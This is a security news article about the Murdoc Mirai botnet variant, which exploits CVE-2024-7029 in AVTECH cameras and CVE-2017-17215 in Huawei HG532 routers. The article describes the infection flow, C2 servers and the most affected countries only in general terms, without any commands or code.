
The Qualys Threat Research Unit has unveiled an extensive campaign involving a new variant of the infamous Mirai malware, dubbed the “Murdoc Botnet.” This variant targets AVTECH cameras and Huawei HG532 routers, exploiting vulnerabilities like CVE-2024-7029 and CVE-2017-17215 to build expansive botnet networks. The campaign, which began in mid-2024, showcases the evolving tactics and sophistication of Mirai-based operations.
The Murdoc Botnet campaign employs ELF files and shell scripts for propagation. These scripts, once deployed, utilize native commands to download and execute malicious payloads. “Each ShellScript is loaded onto devices such as IP cameras, Network devices, and IoT devices, and, in turn, the C2 server loads the new variant of Mirai botnet, i.e., Murdoc Botnet, into the devices,” the report states.
A typical infection flow involves:
- Downloading the payload using wget or ftpget commands.
- Assigning execution permissions via chmod.
- Executing the payload and subsequently removing it to cover tracks.
The botnet’s propagation is particularly effective in unpatched devices, as evidenced by its extensive reach into more than 1,300 identified IPs.

The Qualys team identified over 100 distinct command-and-control (C2) servers facilitating the botnet’s operations. These servers distribute payloads and maintain communication with compromised devices. The campaign has had significant global impact, with the most affected countries being Malaysia, Thailand, Mexico, and Indonesia.
Malaysia emerged as the most targeted country, underscoring the botnet’s preference for regions with high volumes of vulnerable devices.
Murdoc Botnet relies on exploiting well-documented vulnerabilities:
- CVE-2024-7029: Affects AVTECH cameras and is used to embed malicious payloads.
- CVE-2017-17215: Targets Huawei HG532 routers, leveraging command-line injection techniques.
One of the decoded payloads shows a typical attack sequence:
This script reveals the botnet’s method of targeting AVTECH devices to further propagate itself.
By leveraging known vulnerabilities and targeting unpatched devices, it demonstrates the critical need for robust cybersecurity measures in IoT and network infrastructure.
Related Posts:
- IoT Botnet Fuels Large-Scale DDoS Attacks Targeting Global Organizations
- Code for exploiting Zero Day Huawei Router Vulnerability is public
- From 7,000 to 13,000: The Alarming Growth of the 7777 Botnet
- D-Link Issues Warning on End-of-Life Routers Vulnerable to Botnet Exploits
- Mirai Botnet Unleashes Record-Breaking DDoS Attack, Cloudflare Thwarts Threat